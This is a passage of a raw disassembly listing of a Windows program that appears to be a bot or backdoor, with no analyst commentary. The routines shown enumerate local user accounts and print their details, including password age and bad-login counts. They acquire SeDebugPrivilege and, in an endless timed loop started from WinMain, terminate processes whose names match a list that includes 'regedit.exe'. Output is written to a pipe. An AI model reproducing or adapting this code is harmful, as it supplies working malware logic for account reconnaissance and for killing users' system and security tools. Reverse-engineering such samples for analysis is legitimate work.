call dword_4E40E8
pop esi
retn
sub_419DDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419DFB(int,int,int,char *Str,int)
sub_419DFB proc near ; CODE XREF: sub_419CB4+2D�p
Dest = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_419B2F
push [ebp+arg_4]
mov esi, eax
call sub_419B2F
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_4E4278
test eax, eax
mov [ebp+arg_0], eax
jnz loc_41A1A3
mov eax, [ebp+var_4]
test eax, eax
jz loc_41A1DE
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+Dest]
push offset aAccountS ; "Account: %S"
push eax ; Dest
call _sprintf
mov esi, [ebp+arg_10]
mov edi, [ebp+Str]
mov ebx, [ebp+arg_8]
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+0Ch]
lea eax, [ebp+Dest]
push offset aFullNameS ; "Full Name: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+8]
lea eax, [ebp+Dest]
push offset aUserCommentS ; "User Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4]
lea eax, [ebp+Dest]
push offset aCommentS ; "Comment: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
mov eax, [eax+10h]
sub eax, 0
jz short loc_419F1A
dec eax
jz short loc_419F13
dec eax
jz short loc_419F0C
mov eax, offset aUnknown_1 ; "Unknown"
jmp short loc_419F1F
; ---------------------------------------------------------------------------
loc_419F0C: ; CODE XREF: sub_419DFB+108�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_419F1F
; ---------------------------------------------------------------------------
loc_419F13: ; CODE XREF: sub_419DFB+105�j
mov eax, offset aUser_3 ; "User"
jmp short loc_419F1F
; ---------------------------------------------------------------------------
loc_419F1A: ; CODE XREF: sub_419DFB+102�j
mov eax, offset aGuest ; "Guest"
loc_419F1F: ; CODE XREF: sub_419DFB+10F�j
; sub_419DFB+116�j ...
push eax
lea eax, [ebp+Dest]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+14h]
lea eax, [ebp+Dest]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+1Ch]
lea eax, [ebp+Dest]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+20h]
lea eax, [ebp+Dest]
push offset aParametersS ; "Parameters: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+18h]
lea eax, [ebp+Dest]
push offset aPasswordAgeD ; "Password Age: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+2Ch]
lea eax, [ebp+Dest]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+30h]
lea eax, [ebp+Dest]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+24h]
lea eax, [ebp+Dest]
push offset aLastLogonD ; "Last Logon: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+28h]
lea eax, [ebp+Dest]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+34h]
lea eax, [ebp+Dest]
push offset aLogonServerS ; "Logon Server: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+3Ch]
lea eax, [ebp+Dest]
push offset aWorkstationsS ; "Workstations: %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+38h]
lea eax, [ebp+Dest]
push offset aCountryCodeD ; "Country Code: %d"
push eax ; Dest
call _sprintf
push 1 ; int
push esi ; int
lea eax, [ebp+Dest]
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+4Ch]
lea eax, [ebp+Dest]
push offset aUserSLanguageD ; "User's Language: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+40h]
lea eax, [ebp+Dest]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
mov eax, [ebp+var_4]
add esp, 20h
push dword ptr [eax+44h]
lea eax, [ebp+Dest]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
push edi ; Str
push ebx ; int
call sub_409D6C
add esp, 20h
pop edi
pop ebx
jmp short loc_41A1CF
; ---------------------------------------------------------------------------
loc_41A1A3: ; CODE XREF: sub_419DFB+35�j
push eax
lea eax, [ebp+Dest]
push offset asc_4517F8 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_10] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_8] ; int
call sub_409D6C
add esp, 20h
loc_41A1CF: ; CODE XREF: sub_419DFB+3A6�j
cmp [ebp+var_4], 0
jz short loc_41A1DE
push [ebp+var_4]
call dword_4E42B0
loc_41A1DE: ; CODE XREF: sub_419DFB+40�j
; sub_419DFB+3D8�j
mov eax, [ebp+arg_0]
pop esi
leave
retn
sub_419DFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A1E4(int,char *Str,int,int)
sub_41A1E4 proc near ; CODE XREF: sub_401CC7+4836�p
Dest = byte ptr -218h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 218h
push ebx
push esi
push edi
xor esi, esi
push [ebp+arg_C]
mov [ebp+var_4], esi
call sub_419B2F
push esi ; int
mov [ebp+var_14], eax
push [ebp+arg_8] ; int
mov [ebp+arg_C], esi
mov [ebp+var_18], esi
mov [ebp+var_10], esi
push offset aUsernameAccoun ; "Username accounts for local system:"
mov [ebp+var_8], esi
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 18h
loc_41A223: ; CODE XREF: sub_41A1E4+135�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
push esi
push [ebp+var_14]
call dword_4E4180
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_41A284
cmp eax, 0EAh
jz short loc_41A284
push eax
push eax
call sub_41A364
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_451874 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 24h
jmp short loc_41A2FF
; ---------------------------------------------------------------------------
loc_41A284: ; CODE XREF: sub_41A1E4+62�j
; sub_41A1E4+69�j
mov edi, [ebp+var_4]
cmp edi, esi
jz loc_41A312
xor ebx, ebx
cmp [ebp+arg_C], esi
jbe short loc_41A2FF
loc_41A296: ; CODE XREF: sub_41A1E4+ED�j
cmp edi, esi
jz short loc_41A2D5
push dword ptr [edi]
lea eax, [ebp+Dest]
push offset aS_30 ; " %S"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
add edi, 4
inc [ebp+var_8]
inc ebx
cmp ebx, [ebp+arg_C]
jb short loc_41A296
jmp short loc_41A2FF
; ---------------------------------------------------------------------------
loc_41A2D5: ; CODE XREF: sub_41A1E4+B4�j
lea eax, [ebp+Dest]
push offset asc_451840 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 1Ch
loc_41A2FF: ; CODE XREF: sub_41A1E4+9E�j
; sub_41A1E4+B0�j ...
mov edi, [ebp+var_4]
cmp edi, esi
jz short loc_41A312
push edi
call dword_4E42B0
xor edi, edi
mov [ebp+var_4], edi
loc_41A312: ; CODE XREF: sub_41A1E4+A5�j
; sub_41A1E4+120�j
cmp [ebp+var_C], 0EAh
jz loc_41A223
cmp edi, esi
jz short loc_41A32A
push edi
call dword_4E42B0
loc_41A32A: ; CODE XREF: sub_41A1E4+13D�j
push [ebp+var_8]
lea eax, [ebp+Dest]
push offset aTotalUsersFoun ; "Total users found: %d."
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 20h
xor eax, eax
cmp [ebp+var_C], esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_41A1E4 endp
; =============== S U B R O U T I N E =======================================
sub_41A364 proc near ; CODE XREF: sub_41999D+41�p
; sub_419B93+69�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 858h
cmp eax, ecx
ja loc_41A416
jz loc_41A40F
cmp eax, 7Bh
ja short loc_41A3DB
jz short loc_41A3D1
cmp eax, 5
jz short loc_41A3C7
cmp eax, 8
jz short loc_41A3BD
cmp eax, 32h
jz short loc_41A3B3
cmp eax, 35h
jz short loc_41A3A9
cmp eax, 57h
jnz loc_41A465
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_41A486
; ---------------------------------------------------------------------------
loc_41A3A9: ; CODE XREF: sub_41A364+30�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_41A486
; ---------------------------------------------------------------------------
loc_41A3B3: ; CODE XREF: sub_41A364+2B�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_41A486
; ---------------------------------------------------------------------------
loc_41A3BD: ; CODE XREF: sub_41A364+26�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_41A486
; ---------------------------------------------------------------------------
loc_41A3C7: ; CODE XREF: sub_41A364+21�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_41A486
; ---------------------------------------------------------------------------
loc_41A3D1: ; CODE XREF: sub_41A364+1C�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_41A486
; ---------------------------------------------------------------------------
loc_41A3DB: ; CODE XREF: sub_41A364+1A�j
sub eax, 7Ch
jz short loc_41A408
sub eax, 7C8h
jz short loc_41A401
dec eax
jz short loc_41A3F7
dec eax
jnz short loc_41A465
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_41A486
; ---------------------------------------------------------------------------
loc_41A3F7: ; CODE XREF: sub_41A364+84�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_41A486
; ---------------------------------------------------------------------------
loc_41A401: ; CODE XREF: sub_41A364+81�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A408: ; CODE XREF: sub_41A364+7A�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A40F: ; CODE XREF: sub_41A364+11�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A416: ; CODE XREF: sub_41A364+B�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_41A44F
jz short loc_41A448
sub eax, 8ADh
jz short loc_41A47A
dec eax
dec eax
jz short loc_41A441
dec eax
jz short loc_41A43A
dec eax
dec eax
jnz short loc_41A465
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A43A: ; CODE XREF: sub_41A364+C9�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A441: ; CODE XREF: sub_41A364+C6�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A448: ; CODE XREF: sub_41A364+BB�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A44F: ; CODE XREF: sub_41A364+B9�j
sub eax, 8CAh
jz short loc_41A481
sub eax, 17h
jz short loc_41A47A
sub eax, 25h
jz short loc_41A473
sub eax, 29h
jz short loc_41A46C
loc_41A465: ; CODE XREF: sub_41A364+35�j
; sub_41A364+87�j ...
push offset aAnUnknownErr_0 ; "An unknown error occurred."
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A46C: ; CODE XREF: sub_41A364+FF�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A473: ; CODE XREF: sub_41A364+FA�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A47A: ; CODE XREF: sub_41A364+C2�j
; sub_41A364+F5�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_41A486
; ---------------------------------------------------------------------------
loc_41A481: ; CODE XREF: sub_41A364+F0�j
push offset aNetworkConnect ; "Network connection not found."
loc_41A486: ; CODE XREF: sub_41A364+40�j
; sub_41A364+4A�j ...
push offset byte_4F3F24 ; Dest
call _sprintf
pop ecx
mov eax, offset byte_4F3F24
pop ecx
retn
sub_41A364 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A498(char *Source)
sub_41A498 proc near ; CODE XREF: sub_401CC7+487B�p
Dest = word ptr -718h
var_318 = byte ptr -318h
var_108 = byte ptr -108h
Source = dword ptr 8
push ebp
mov ebp, esp
sub esp, 718h
push esi
push 200h ; MaxCount
push [ebp+Source] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _mbstowcs
add esp, 0Ch
lea eax, [ebp+Source]
mov esi, 108h
push eax
lea eax, [ebp+var_108]
push eax
mov [ebp+Source], esi
call ds:dword_4F63C8 ; GetComputerNameA
lea eax, [ebp+var_108]
push esi ; MaxCount
push eax ; Source
lea eax, [ebp+var_318]
push eax ; Dest
call _mbstowcs
lea eax, [ebp+Dest]
push eax ; Str
call _wcslen
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_318]
push 0
push eax
push 0
call dword_4E4230
test eax, eax
jnz short loc_41A528
mov esi, offset byte_4F3D20
push offset asc_451B70 ; "-"
push esi ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_41A551
; ---------------------------------------------------------------------------
loc_41A528: ; CODE XREF: sub_41A498+7A�j
lea ecx, [ebp+Dest]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_41A364
pop ecx
mov esi, offset byte_4F3D20
push eax
push offset asc_451B98 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
loc_41A551: ; CODE XREF: sub_41A498+8E�j
mov eax, esi
pop esi
leave
retn
sub_41A498 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A556 proc near ; CODE XREF: sub_417AC3+45�p
; sub_417AC3+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_4F6400 ; GetCurrentProcess
push eax
call dword_4E4204 ; OpenProcessToken
test eax, eax
jnz short loc_41A575
leave
retn
; ---------------------------------------------------------------------------
loc_41A575: ; CODE XREF: sub_41A556+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_4E41DC ; LookupPrivilegeValueA
test eax, eax
jz short loc_41A5B3
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_41A59C
or [ebp+var_8], 2
jmp short loc_41A5A0
; ---------------------------------------------------------------------------
loc_41A59C: ; CODE XREF: sub_41A556+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_41A5A0: ; CODE XREF: sub_41A556+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_4E428C ; AdjustTokenPrivileges
mov esi, eax
loc_41A5B3: ; CODE XREF: sub_41A556+32�j
push [ebp+var_4]
call ds:dword_4F6370 ; CloseHandle
mov eax, esi
pop esi
leave
retn
sub_41A556 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A5C1(int,char *Str,int,char *Str2,int,int)
sub_41A5C1 proc near ; CODE XREF: sub_401CC7+7A67�p
; sub_41A804+74�p ...
Dest = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
Str1 = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
Str2 = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_4E4240, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_41A7D4
cmp dword_4E4224, ebx
jz loc_41A7D4
cmp dword_4E4134, ebx
jz loc_41A7D4
push 1
push offset aSedebugprivi_1 ; "SeDebugPrivilege"
call sub_41A556
pop ecx
pop ecx
push ebx
push 0Fh
call dword_4E4240 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_41A7C7
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call dword_4E4224 ; Process32First
mov esi, ds:dword_4F6370
test eax, eax
jz loc_41A7C2
lea eax, [ebp+var_130]
push eax
push edi
call dword_4E4134 ; Process32Next
test eax, eax
jz loc_41A7C2
mov edi, ds:dword_4F638C
mov ebx, 1F0FFFh
loc_41A685: ; CODE XREF: sub_41A5C1+1F9�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_41A6EC
mov [ebp+var_4], offset off_451BC8
loc_41A693: ; CODE XREF: sub_41A5C1+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+Str1]
push eax
call ds:dword_4F648C ; lstrcmpi
test eax, eax
jz short loc_41A6BB
add [ebp+var_4], 4
cmp [ebp+var_4], offset aRegedit_exe ; "regedit.exe"
jb short loc_41A693
jmp loc_41A7A8
; ---------------------------------------------------------------------------
loc_41A6BB: ; CODE XREF: sub_41A5C1+E6�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz loc_41A7A8
push 0
push eax
call ds:dword_4F63F8 ; TerminateProcess
test eax, eax
jnz loc_41A7A8
loc_41A6E2: ; CODE XREF: sub_41A5C1+1CD�j
push [ebp+var_4]
call esi ; CloseHandle
jmp loc_41A7A8
; ---------------------------------------------------------------------------
loc_41A6EC: ; CODE XREF: sub_41A5C1+C9�j
cmp [ebp+Str2], eax
jnz loc_41A793
cmp [ebp+Str], eax
jz loc_41A7A8
push [ebp+var_128]
push 8
call dword_4E4240 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_41A753
lea ecx, [ebp+var_354]
push ecx
push eax
call dword_4E40E0 ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_41A745
lea eax, [ebp+var_234]
push eax
push offset aSD_0 ; " %s (%d)"
jmp short loc_41A765
; ---------------------------------------------------------------------------
loc_41A745: ; CODE XREF: sub_41A5C1+174�j
lea eax, [ebp+Str1]
push eax
push offset aSD_1 ; " %s (%d)"
jmp short loc_41A765
; ---------------------------------------------------------------------------
loc_41A753: ; CODE XREF: sub_41A5C1+15C�j
push [ebp+var_128]
lea eax, [ebp+Str1]
push eax
push offset aSD_2 ; " %s (%d)"
loc_41A765: ; CODE XREF: sub_41A5C1+182�j
; sub_41A5C1+190�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push 1 ; int
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D6C
add esp, 14h
jmp loc_41A6E2
; ---------------------------------------------------------------------------
loc_41A793: ; CODE XREF: sub_41A5C1+12E�j
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41A7DB
loc_41A7A8: ; CODE XREF: sub_41A5C1+F5�j
; sub_41A5C1+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_4E4134 ; Process32Next
test eax, eax
jnz loc_41A685
xor ebx, ebx
loc_41A7C2: ; CODE XREF: sub_41A5C1+9D�j
; sub_41A5C1+B3�j
push [ebp+var_8]
call esi ; CloseHandle
loc_41A7C7: ; CODE XREF: sub_41A5C1+77�j
push ebx
push offset aSedebugprivi_2 ; "SeDebugPrivilege"
call sub_41A556
pop ecx
pop ecx
loc_41A7D4: ; CODE XREF: sub_41A5C1+3A�j
; sub_41A5C1+46�j ...
xor eax, eax
loc_41A7D6: ; CODE XREF: sub_41A5C1+241�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41A7DB: ; CODE XREF: sub_41A5C1+1E5�j
push [ebp+var_128]
push 0
push ebx
call edi ; OpenProcess
push [ebp+var_8]
mov edi, eax
call esi ; CloseHandle
push 0
push edi
call ds:dword_4F63F8 ; TerminateProcess
test eax, eax
jnz short loc_41A7FF
push edi
call esi ; CloseHandle
jmp short loc_41A7D4
; ---------------------------------------------------------------------------
loc_41A7FF: ; CODE XREF: sub_41A5C1+237�j
push 1
pop eax
jmp short loc_41A7D6
sub_41A5C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A804 proc near ; DATA XREF: sub_401CC7+26BF�o
Dest = byte ptr -298h
var_98 = dword ptr -98h
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset asc_451DC0 ; "-"
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_41A863
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_98] ; int
call sub_409D6C
add esp, 14h
loc_41A863: ; CODE XREF: sub_41A804+3D�j
push [ebp+var_10] ; int
lea eax, [ebp+Str]
push esi ; int
push esi ; Str2
push [ebp+var_C] ; int
push eax ; Str
push [ebp+var_98] ; int
call sub_41A5C1
add esp, 18h
test eax, eax
jnz short loc_41A88B
push offset unk_451DE0
jmp short loc_41A890
; ---------------------------------------------------------------------------
loc_41A88B: ; CODE XREF: sub_41A804+7E�j
push offset asc_451E04 ; "-"
loc_41A890: ; CODE XREF: sub_41A804+85�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_41A8C3
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_98] ; int
call sub_409D6C
add esp, 14h
loc_41A8C3: ; CODE XREF: sub_41A804+9D�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_14]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_41A804 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A8E2 proc near ; CODE XREF: sub_401CC7+7A09�p
; sub_40B8C9+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_4F638C ; OpenProcess
mov esi, eax
test esi, esi
jz short loc_41A914
push 0
push esi
call ds:dword_4F63F8 ; TerminateProcess
test eax, eax
jnz short loc_41A914
push esi
xor edi, edi
call ds:dword_4F6370 ; CloseHandle
loc_41A914: ; CODE XREF: sub_41A8E2+1A�j
; sub_41A8E2+27�j
mov eax, edi
pop edi
pop esi
retn
sub_41A8E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_41A919 proc near ; DATA XREF: WinMain(x,x,x,x)+3CD�o
push esi
xor esi, esi
loc_41A91C: ; CODE XREF: sub_41A919+1E�j
push 1 ; int
push esi ; int
push esi ; Str2
push esi ; int
push esi ; Str
push esi ; int
call sub_41A5C1
add esp, 18h
push dword_451BC4
call ds:dword_4F6380 ; Sleep
jmp short loc_41A91C
sub_41A919 endp
; =============== S U B R O U T I N E =======================================
sub_41A939 proc near ; CODE XREF: sub_41A969+2A�p
; sub_41A9A1+7E�p ...
mov eax, dword_4F458C
push esi
mov esi, ds:dword_4F6370
cmp eax, 0FFFFFFFFh
jz short loc_41A94D
push eax
call esi ; CloseHandle
loc_41A94D: ; CODE XREF: sub_41A939+F�j
mov eax, dword_4F4594
cmp eax, 0FFFFFFFFh
jz short loc_41A95A
push eax
call esi ; CloseHandle
loc_41A95A: ; CODE XREF: sub_41A939+1C�j
mov eax, dword_4F4588
cmp eax, 0FFFFFFFFh
jz short loc_41A967
push eax
call esi ; CloseHandle
loc_41A967: ; CODE XREF: sub_41A939+29�j
pop esi
retn
sub_41A939 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41A969(char *Str)
sub_41A969 proc near ; CODE XREF: sub_401CC7+775F�p
; sub_4167F7+14A�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push [ebp+Str] ; Str
call _strlen
pop ecx
mov [ebp+var_4], eax
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
push [ebp+Str]
push dword_4F4590
call ds:dword_4F63E8 ; WriteFile
test eax, eax
jnz short loc_41A99C
call sub_41A939
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_41A99C: ; CODE XREF: sub_41A969+28�j
push 1
pop eax
